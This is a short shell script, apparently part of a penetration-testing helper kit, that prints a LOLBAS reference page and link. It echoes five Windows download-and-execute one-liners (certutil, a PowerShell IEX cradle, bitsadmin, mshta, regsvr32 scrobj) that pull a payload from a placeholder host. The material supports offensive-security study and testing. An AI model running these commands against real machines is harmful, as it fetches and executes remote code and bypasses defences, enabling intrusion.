#!/bin/sh
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
. "$SCRIPT_DIR/../common-script.sh"

echo ""
info "=== LOLBAS Search ==="
info "LOLBAS (Living Off The Land Binaries And Scripts)"
info "Windows binaries that can be used for bypasses and privesc."
echo ""
info "Search online:"
echo "  https://lolbas-project.github.io/"
echo ""
info "Common LOLBINS:"
echo "  certutil -urlcache -split -f http://host/file payload.exe"
echo "  powershell -c IEX(New-Object Net.WebClient).DownloadString('http://host/script.ps1')"
echo "  bitsadmin /transfer job /download /priority high http://host/file C:\\temp\\file"
echo "  mshta http://host/payload.hta"
echo "  regsvr32 /s /n /u /i:http://host/payload.sct scrobj.dll"
echo ""
info "Running: displaying LOLBAS info"
